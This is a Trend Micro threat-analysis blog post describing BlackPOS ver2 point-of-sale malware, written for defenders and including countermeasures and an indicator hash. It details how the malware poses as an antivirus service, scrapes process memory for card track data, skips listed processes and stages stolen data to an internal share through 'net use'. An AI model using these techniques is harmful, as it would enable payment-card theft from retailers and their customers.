• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Malware   »   New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts

New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts

  • Posted on:August 29, 2014 at 12:25 am
  • Posted in:Malware
  • Author:
    Rhena Inocencio (Threat Response Engineer)
0

We recently spotted a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A.  In 2012, the source code of BlackPOS was leaked, enabling other cybercriminals and attackers to enhance its code.  What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems. This routine is different from previous PoS malware such as TSPY_POCARDL.U and TSPY_POCARDL.AB (BlackPOS) that employed the targeted company’s own installed service.

The malware can be run with options: -[start|stop|install|uninstall]. The –install option installs the malware with service name =<AV_Company> Framework Management Instrumentation, and the –uninstall option deletes the said service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service.

Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes.

It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip.

The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store, Target last December 2013.

 

Fig1_darkpos

Figure 1. CreateToolhelp32Snapshot to enumerate processes

Based on our analysis, this PoS malware uses a new custom search routine to check the RAM for Track data. These custom search routines have replaced the regex search in newer PoS malware. It samples 0x20000h bytes [the 0x and h implies hex bytes] in each pass, and continues scanning till it has scanned the entire memory region of the process being inspected.

fig2_blackpos

Figure 2. Screenshot of reading process memory

fig3_blackpos

Figure 3. Logging of data

It has an exclusion list that functions to ignore certain processes where track data  is not found. It gathers track data by scanning the memory of the all running processes except for the following:

  • smss.exe
  • csrss.exe
  • wininit.exe
  • services.exe
  • lsass.exe
  • svchost.exe
  • winlogon.exe
  • sched.exe
  • spoolsv.exe
  • System
  • conhost.exe
  • ctfmon.exe
  • wmiprvse.exe
  • mdm.exe
  • taskmgr.exe
  • explorer.exe
  • RegSrvc.exe
  • firefox.exe
  • chrome.exe

This skipping of scanning specific processes is similar to VSkimmer (detected as BKDR_HESETOX.CC).

In TSPY_MEMLOG.A, the grabbed credit card Track data from memory is saved into a file McTrayErrorLogging.dll and sent to a shared location within the same network. We’ve seen this routine with another BlackPOS/Kaptoxa detected as TSPY_POCARDL.AB. However, the only difference is that TSPY_MEMLOG.A uses a batch file for moving the gathered data within the shared network while TSPY_POCARDL.AB executes the net command via cmd.exe. It is highly possible that the server is compromised since the malware uses a specific username for logging into the domain.

Data Exfiltration Mechanism

The malware drops the component t.bat which is responsible for transferring the data from McTrayErrorLogging.dll to a specific location in the network, t:\temp\dotnet\NDP45-KB2737084-x86.exe. It uses the following command to transfer the gathered data:

fig4_blackpos

Figure 4. Screenshot of command used to transfer data

The “net use” command was used to connect from one machine to another machine’s drive. It uses a specific username to login to the domain above (IP address). It will open device t: on 10.44.2.153 drive D.

In one the biggest data breach we’ve seen in 2013, the cybercriminals behind it, offloaded the gathered data to a compromised server first while a different malware running on the compromised server uploaded it to the FTP. We surmise that this new BlackPOS malware uses the same exfiltration tactic.

Countermeasures

PoS malware can possibly arrive on the affected network via the following means:

  • Targeting specific servers by point of entry and lateral movement
  • Hacking network communication
  • Infect machine before deployment

As such, we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware. For more information on PoS malware, read our white paper, Point-of-Sale System Breaches: Threats to the Retail and Hospitality Industries.

Trend Micro protects enterprises from threats like PoS malware by detecting the malicious file.

The related hash to this threat is  b57c5b49dab6bbd9f4c464d396414685.

With additional analysis from Numaan Huq

Update as of 9:44 AM, September 8, 2014

During the course of our investigation, we spotted the following anti-American messages embedded in the binary:

pos_malware_blackpos2

Figure 5. Screenshot of the messages embedded in the binary

(Click image above to enlarge)

Note that these are not used anywhere in the code and we surmise that these may be like a signature used by the group developing this malware.

Update as of 2:27 PM, September 11, 2014

Even though BlackPOS ver2 has an entirely different code compared to the BlackPOS which compromised Target, it duplicates the data exfiltration technique used by the Target BlackPOS. It is an improved clone of the original, which is why we decided to call this BlackPOS ver2.

It is also being reported in the press that some security vendors called this malware as “FrameworkPOS.”  This is a play of the service name <AV_Company> Framework Management Instrumentation with which the malware installs itself.

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»
Tags: POS malwarePoS system

Security Predictions for 2020

  • Cybersecurity in 2020 will be viewed through many lenses — from differing attacker motivations and cybercriminal arsenal to technological developments and global threat intelligence — only so defenders can keep up with the broad range of threats.
    Read our security predictions for 2020.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • Our New Blog
  • How Unsecure gRPC Implementations Can Compromise APIs, Applications
  • XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers, Leverages Zero-day Exploits
  • August Patch Tuesday Fixes Critical IE, Important Windows Vulnerabilities Exploited in the Wild
  • Water Nue Phishing Campaign Targets C-Suite’s Office 365 Accounts

Popular Posts

Sorry. No data so far.

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.